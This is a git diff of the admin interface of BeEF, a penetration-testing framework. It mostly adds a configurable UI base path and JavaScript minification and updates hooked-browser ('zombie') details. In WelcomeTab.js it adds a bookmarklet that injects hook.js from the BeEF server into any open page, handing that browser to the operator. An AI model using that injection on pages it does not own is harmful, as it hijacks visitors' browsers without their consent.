'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
'client_debug' => @configuration.get("beef.client.debug")
}
end

70
extensions/admin_ui/api/handler.rb
View File

@@ -12,40 +12,90 @@ module API
# We use this module to register all the http handler for the Administrator UI
#
module Handler
require 'uglifier'
BeEF::API::Registrar.instance.register(BeEF::Extension::AdminUI::API::Handler, BeEF::API::Server, 'mount_handler')
def self.evaluate_and_minify(content, params, name)
erubis = Erubis::FastEruby.new(content)
evaluated = erubis.evaluate(params)
minified = Uglifier.compile(evaluated)
write_to = File.new("#{File.dirname(__FILE__)}/../media/javascript-min/#{name}.js", "w+")
File.open(write_to, 'w') { |file| file.write(minified) }
File.path write_to
end
def self.build_javascript_ui(beef_server)
auth_js_file = File.read(File.dirname(__FILE__)+'/../media/javascript/ui/authentication.js') + "\n\n"
js_files = ""
#NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
ux = %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js)
global_js = esapi + ux + panel
global_js.each do |file|
js_files << File.read(File.dirname(__FILE__)+'/../media/javascript/'+file) + "\n\n"
end
config = BeEF::Core::Configuration.instance
bp = config.get "beef.http.web_ui_basepath"
# if more dynamic variables are needed in JavaScript files
# add them here in the following Hash
params = {
'base_path' => bp
}
# process all JavaScript files, evaluating them with Erubis
web_ui_all = self.evaluate_and_minify(js_files, params, 'web_ui_all')
web_ui_auth = self.evaluate_and_minify(auth_js_file, params, 'web_ui_auth')
beef_server.mount("#{bp}/web_ui_all.js", Rack::File.new(web_ui_all))
beef_server.mount("#{bp}/web_ui_auth.js", Rack::File.new(web_ui_auth))
end
#
# This function gets called automatically by the server.
#
def self.mount_handler(beef_server)
# retrieve the configuration class instance
configuration = BeEF::Core::Configuration.instance
config = BeEF::Core::Configuration.instance
# Web UI base path, like http://beef_domain/<bp>/panel
bp = config.get "beef.http.web_ui_basepath"
# registers the http controllers used by BeEF core (authentication, logs, modules and panel)
Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module|
require http_module
mod_name = File.basename http_module, '.rb'
beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
end
# registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..)
Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module|
require http_module
mod_name = File.basename http_module, '.rb'
beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
end
# mount the folder were we store static files (javascript, css, images) for the admin ui
media_dir = File.dirname(__FILE__)+'/../media/'
beef_server.mount('/ui/media', Rack::File.new(media_dir))
beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
# mount the favicon file, if we're not imitating a web server.
if !configuration.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
if !config.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}"))
end
self.build_javascript_ui beef_server
end
end

26
extensions/admin_ui/classes/httpcontroller.rb
View File

@@ -40,8 +40,12 @@ module AdminUI
def run(request, response)
@request = request
@params = request.params
@session = BeEF::Extension::AdminUI::Session.instance
auth_url = '/ui/authentication'
@session = BeEF::Extension::AdminUI::Session.instance
config = BeEF::Core::Configuration.instance
# Web UI base path, like http://beef_domain/<bp>/panel
@bp = config.get "beef.http.web_ui_basepath"
auth_url = "#{@bp}/authentication"
# test if session is unauth'd and whether the auth functionality is requested
if not @session.valid_session?(@request) and not self.class.eql?(BeEF::Extension::AdminUI::Controllers::Authentication)
@@ -78,14 +82,14 @@ module AdminUI
end
# Constructs a redirect script
def script_redirect(location) "<script> document.location=\"#{location}\"</script>" end
# Constructs a html script tag
def script_tag(filename) "<script src=\"#{$url}/ui/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
# Constructs a html script tag (from media/javascript directory)
def script_tag(filename) "<script src=\"#{$url}#{@bp}/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
# Constructs a html script tag (from media/javascript-min directory)
def script_tag_min(filename) "<script src=\"#{$url}#{@bp}/media/javascript-min/#{filename}\" type=\"text/javascript\"></script>" end
# Constructs a html stylesheet tag
def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}/ui/media/css/#{filename}\" type=\"text/css\" />" end
def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}#{@bp}/media/css/#{filename}\" type=\"text/css\" />" end
# Constructs a hidden html nonce tag
def nonce_tag
@@ -93,6 +97,10 @@ module AdminUI
"<input type=\"hidden\" name=\"nonce\" id=\"nonce\" value=\"" + @session.get_nonce + "\"/>"
end
def base_path
"#{@bp}"
end
private
@eruby

4
extensions/admin_ui/controllers/authentication/index.html
View File

@@ -9,7 +9,7 @@
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag 'ui/authentication.js' %>
<%= script_tag_min 'web_ui_auth.js' %>
<%= stylesheet_tag 'ext-all.css' %>
@@ -31,6 +31,6 @@
</head>
<body>
<div id="centered"><img id="beef-logo" src="/ui/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
<div id="centered"><img id="beef-logo" src="<%= base_path %>/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
</body>
</html>

1
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit Reader', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

45
extensions/admin_ui/controllers/panel/index.html
View File

@@ -12,47 +12,8 @@
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag 'ext-beef.js' %>
<!-- jQuery encoder (ESAPI way) -->
<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
<%= script_tag 'esapi/Class.create.js' %>
<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
<!-- BeEF Web UI common functions-->
<%= script_tag 'ui/common/beef_common.js' %>
<%= script_tag 'ux/TabCloseMenu.js' %>
<%= script_tag 'ux/StatusBar.js' %>
<%= script_tag 'ux/PagingStore.js' %>
<%= script_tag 'ui/panel/common.js' %>
<%= script_tag 'ui/panel/DistributedEngine.js' %>
<%= script_tag 'ui/panel/PanelStatusBar.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabDetails.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabLogs.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabCommands.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %>
<%= script_tag 'wterm/wterm.jquery.js' %>
<%= script_tag_min 'web_ui_all.js' %>
<%= stylesheet_tag 'wterm.css' %>
<script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
<%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
<%= script_tag 'ui/panel/PanelViewer.js' %>
<%= script_tag 'ui/panel/DataGrid.js' %>
<%= script_tag 'ui/panel/MainPanel.js' %>
<%= script_tag 'ui/panel/ZombieTab.js' %>
<%= script_tag 'ui/panel/ZombieTabs.js' %>
<%= script_tag 'ui/panel/zombiesTreeList.js' %>
<%= script_tag 'ui/panel/ZombiesMgr.js' %>
<%= script_tag 'ui/panel/Logout.js' %>
<%= script_tag 'ui/panel/WelcomeTab.js' %>
<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
<%= stylesheet_tag 'ext-all.css' %>
<%= stylesheet_tag 'base.css' %>
</head>
@@ -60,8 +21,10 @@
<body>
<%= nonce_tag %>
<div id="header">
<div class="left-menu" id="header-right">
</div>
<div class="right-menu">
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
<img src="<%= base_path %>/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a>

6
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -87,13 +87,12 @@ module BeEF
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_webrtc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_wmp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP')
has_vlc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
has_foxit = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
@@ -112,12 +111,11 @@ module BeEF
'has_flash' => has_flash,
'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears,
'has_java' => has_java,
'has_webrtc' => has_webrtc,
'has_activex' => has_activex,
'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime,
'has_wmp' => has_wmp,
'has_vlc' => has_vlc,
'has_foxit' => has_foxit,
'has_realplayer' => has_realplayer,
'date_stamp' => date_stamp

13
extensions/admin_ui/media/css/base.css
View File

@@ -5,13 +5,24 @@
*/
#header .right-menu {
width: 300px;
float: right;
margin: 10px;
margin: 3px 3px 0 4px;
word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica;
color:#000;
}
#header .left-menu {
width: 300px;
float: left;
margin: 10px 4px 0 20px;
word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica;
font-weight: bolder;
color:red;
}
#header a:link,
#header a:visited {
color:#000;

2
extensions/admin_ui/media/javascript-min/readme Normal file
View File

@@ -0,0 +1,2 @@
This directory will contain minified JavaScript files used by the Web UI.
Those files are excluded from the GIT report through the .gitignore file.

5
extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
View File

File diff suppressed because one or more lines are too long

36
extensions/admin_ui/media/javascript/ext-beef.js
View File

@@ -1,36 +0,0 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
Ext.beef = function(){
var msgCt;
function createBox(t, s){
return ['<div class="msg">',
'<div class="x-box-tl"><div class="x-box-tr"><div class="x-box-tc"></div></div></div>',
'<div class="x-box-ml"><div class="x-box-mr"><div class="x-box-mc"><h3>', t, '</h3>', s, '</div></div></div>',
'<div class="x-box-bl"><div class="x-box-br"><div class="x-box-bc"></div></div></div>',
'</div>'].join('');
}
return {
msg : function(title, format){
if(!msgCt){
msgCt = Ext.DomHelper.insertFirst(document.body, {id:'msg-div'}, true);
}
msgCt.alignTo(document, 't-t');
var s = String.format.apply(String, Array.prototype.slice.call(arguments, 1));
var m = Ext.DomHelper.append(msgCt, {html:createBox(title, s)}, true);
m.slideIn('t').pause(1).ghost("t", {remove:true});
},
init : function(){
var lb = Ext.get('lib-bar');
if(lb){
lb.show();
}
}
};
}();

2
extensions/admin_ui/media/javascript/ui/authentication.js
View File

@@ -12,7 +12,7 @@ Ext.onReady(function() {
login_form.getForm().submit({
success: function() {
window.location.href = '/ui/panel'
window.location.href = "<%= @base_path %>/panel"
},
failure: function() {
if(Ext.get('loginError') == null) {

2
extensions/admin_ui/media/javascript/ui/common/beef_common.js
View File

@@ -20,7 +20,7 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
*/
get_rest_token: function() {
if(this.rest_token.length == 0){
var url = "/ui/modules/getRestfulApiToken.json";
var url = "<%= @base_path %>/modules/getRestfulApiToken.json";
jQuery.ajax({
contentType: 'application/json',
dataType: 'json',

6
extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
View File

@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
dataIndex: 'type',
sortable: true,
width: 60,
renderer: function(value, metaData, record, rowIndex, colIndex, store) {
renderer: function(value) {
return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
}
}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
dataIndex: 'event',
sortable:true,
width: 420,
renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
renderer: function(value){
return $jEncoder.encoder.encodeForHTML(value);
}
}, {
id: 'log-date',
header: "Date",

4
extensions/admin_ui/media/javascript/ui/panel/Logout.js
View File

@@ -10,12 +10,12 @@ DoLogout = function() {
after_logout = function() {
// will redirect the UA to the login
window.location.href = '/ui/panel'
window.location.href = '<%= @base_path %>/panel'
}
button.on('click', function(){
Ext.Ajax.request({
url: '/ui/authentication/logout',
url: '<%= @base_path %>/authentication/logout',
method: 'POST',
params: 'nonce=' + Ext.get("nonce").dom.value,
success: after_logout,

2
extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
View File

@@ -29,7 +29,7 @@ MainPanel = function(){
}
});
this.grid = new DataGrid('/ui/logs/all.json',30);
this.grid = new DataGrid('<%= @base_path %>/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;

24
extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
View File

@@ -42,19 +42,39 @@ Ext.onReady(function() {
* This event updater retrieves updates every 8 seconds. Those updates
* are then pushed to various managers (i.e. the zombie manager).
*/
var lastpoll = new Date().getTime();
Ext.TaskMgr.start({
run: function() {
Ext.Ajax.request({
url: '/ui/panel/hooked-browser-tree-update.json',
url: '<%= @base_path %>/panel/hooked-browser-tree-update.json',
method: 'POST',
success: function(response) {
var updates = Ext.util.JSON.decode(response.responseText);
var updates;
try {
updates = Ext.util.JSON.decode(response.responseText);
} catch (e) {
//The framework has probably been reset and you're actually logged out
var hr = document.getElementById("header-right");
hr.innerHTML = "You appear to be logged out. <a href='<%= @base_path %>/panel/'>Login</a>";
}
var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
if(zombiesManager && hooked_browsers) {
zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
}
lastpoll = new Date().getTime();
var hr = document.getElementById("header-right");
hr.innerHTML = "";
},
failure: function(response) {
var timenow = new Date().getTime();
if ((timenow - lastpoll) > 60000) {
var hr = document.getElementById("header-right");
hr.innerHTML = "Framework is down";
}
}
});
},

11
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -6,13 +6,18 @@
WelcomeTab = function() {
var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
welcome = " \
<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
<p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
<p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
<p>Official website: <a href='http://beefproject.com/'>http://beefproject.com/</a></p><br />\
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
<p>Welcome to BeEF!</p><br /> \
<p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
<p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
<p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
<p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
</div>\
";
WelcomeTab.superclass.constructor.call(this, {
welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
WelcomeTab.superclass.constructor.call(this, {
region:'center',
padding:'10 10 10 10',
html: welcome,

24
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -26,19 +26,18 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"];
var has_webrtc = zombie_array[index]["has_webrtc"];
var has_activex = zombie_array[index]["has_activex"];
var has_wmp = zombie_array[index]["has_wmp"];
var has_vlc = zombie_array[index]["has_vlc"];
var has_foxit = zombie_array[index]["has_foxit"];
var has_wmp = zombie_array[index]["has_wmp"];
var has_foxit = zombie_array[index]["has_foxit"];
var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"];
var date_stamp = zombie_array[index]["date_stamp"];
text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text = "<img src='<%= @base_path %>/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= ip;
balloon_text = "IP: " + ip;
@@ -47,14 +46,13 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>WebRTC: " + has_webrtc;
balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp;
@@ -67,7 +65,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
'balloon_text' : balloon_text,
'check' : false,
'domain' : domain,
'port' : port
'port' : port
};
return new_zombie;

43
extensions/admin_ui/media/javascript/ui/panel/common.js
View File

@@ -111,7 +111,7 @@ function get_dynamic_payload_details(payload, zombie) {
modid = Ext.getCmp( 'form-zombie-'+zombie.session+'-field-mod_id').value
Ext.Ajax.request({
loadMask: true,
url: '/ui/modules/select/commandmodule.json',
url: '/<%= @base_path %>/modules/select/commandmodule.json',
method: 'POST',
params: 'command_module_id=' + modid + '&' + 'payload_name=' + payload,
success: function(resp) {
@@ -146,7 +146,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
panel.removeAll();
Ext.Ajax.request({
url: '/ui/modules/select/command.json',
url: '<%= @base_path %>/modules/select/command.json',
method: 'POST',
params: 'command_id=' + command_id,
loadMask: true,
@@ -159,7 +159,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
}
var form = new Ext.form.FormPanel({
url: '/ui/modules/commandmodule/reexecute',
url: '<%= @base_path %>/modules/commandmodule/reexecute',
id: 'form-command-module-zombie-'+zombie.session,
border: false,
labelWidth: 75,
@@ -208,7 +208,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
});
var grid_store = new Ext.data.JsonStore({
url: '/ui/modules/select/command_results.json?command_id='+command_id,
url: '<%= @base_path %>/modules/select/command_results.json?command_id='+command_id,
storeId: 'command-results-store-zombie-'+zombie.session,
root: 'results',
remoteSort: false,
@@ -241,7 +241,8 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
viewConfig: {
forceFit:true
},
// render command responses
columns:[new Ext.grid.RowNumberer({width: 20}), {
dataIndex: 'date',
sortable: false,
@@ -250,11 +251,29 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
html += '<p>';
for(index in record.data.data) {
result = record.data.data[index];
index = index.toString().replace('_', ' ');
//output escape everything, but allow the <br> tag for better rendering.
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
index = index.toString().replace('_', ' ');
// Check for a base64 encoded image
var header = "image=data:image/(jpg|png);base64,";
var re = new RegExp(header, "");
if (result.match(re)) {
// Render the image
try {
var img = result.replace(/[\r\n]/g, '');
base64_data = window.atob(img.replace(re, ''));
html += String.format('<img src="{0}" /><br>', img.replace(/^image=/, ''));
} catch(e) {
console.log("Received invalid base64 encoded image string: "+e.toString());
html += String.format('<b>{0}</b>: {1}<br>', index, result);
}
// output escape everything else, but allow the <br> tag for better rendering.
} else {
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
}
}
html += '</p>';
return html;
}
@@ -301,7 +320,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
} else {
Ext.Ajax.request({
loadMask: true,
url: '/ui/modules/select/commandmodule.json',
url: '<%= @base_path %>/modules/select/commandmodule.json',
method: 'POST',
params: 'command_module_id=' + command_module_id,
success: function(resp) {
@@ -312,9 +331,9 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
return;
}
var submiturl = '/ui/modules/commandmodule/new';
var submiturl = '<%= @base_path %>/modules/commandmodule/new';
if(module.dynamic){
submiturl = '/ui/modules/commandmodule/dynamicnew';
submiturl = '<%= @base_path %>/modules/commandmodule/dynamicnew';
}
module = module.command_modules[1];

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
View File

@@ -248,7 +248,7 @@ ZombieTab_Autorun = function(zombie) {
}
}})],
loader: new Ext.tree.TreeLoader({
dataUrl: '/ui/modules/select/commandmodules/tree.json',
dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
baseParams: {zombie_session: zombie.session},
createNode: function(attr) {
if(attr.checked == null){attr.checked = false;}

4
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
View File

@@ -19,7 +19,7 @@ ZombieTab_Commands = function(zombie) {
var command_module_grid = new Ext.grid.GridPanel({
store: new Ext.data.JsonStore({
url: '/ui/modules/commandmodule/commands.json',
url: '<%= @base_path %>/modules/commandmodule/commands.json',
params: { // insert the nonce with the form
nonce: Ext.get ("nonce").dom.value
},
@@ -107,7 +107,7 @@ ZombieTab_Commands = function(zombie) {
rootVisible: false,
root: {nodeType: 'async'},
loader: new Ext.tree.TreeLoader({
dataUrl: '/ui/modules/select/commandmodules/tree.json',
dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
baseParams: {zombie_session: zombie.session},
listeners:{
beforeload: function(treeloader, node, callback) {

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
View File

@@ -10,7 +10,7 @@
ZombieTab_DetailsTab = function(zombie) {
var store_summary = new Ext.data.GroupingStore({
url: '/ui/modules/select/zombie_summary.json',
url: '<%= @base_path %>/modules/select/zombie_summary.json',
baseParams: {zombie_session: zombie.session} ,
reader: new Ext.data.JsonReader({
root: 'results'

10
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
View File

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
id = data.id;
},
error: function(){
console.log("Error getting module id.");
beef.debug("Error getting module id.");
}
});
return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
async: false,
processData: false,
success: function(data){
console.log("data: " + data.command_id);
beef.debug("data: " + data.command_id);
result = "Command [" + data.command_id + "] sent successfully";
},
error: function(){
console.log("Error sending command");
beef.debug("Error sending command");
return "Error sending command";
}
});
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
processData: false,
success: function(data){
$jwterm.each(data, function(i){
console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
results += $jwterm.parseJSON(data[i].data).data;
});
},
error: function(){
console.log("Error sending command");
beef.debug("Error sending command");
return "Error sending command";
}
});

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
View File

@@ -9,7 +9,7 @@
*/
ZombieTab_LogTab = function(zombie) {
var zombieLog = new DataGrid('/ui/logs/zombie.json',30,{session:zombie.session});
var zombieLog = new DataGrid('<%= @base_path %>/logs/zombie.json',30,{session:zombie.session});
zombieLog.border = false;
ZombieTab_LogTab.superclass.constructor.call(this, {

10
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
View File

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
title: 'Proxy',
layout: 'fit',
padding: '10 10 10 10',
html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
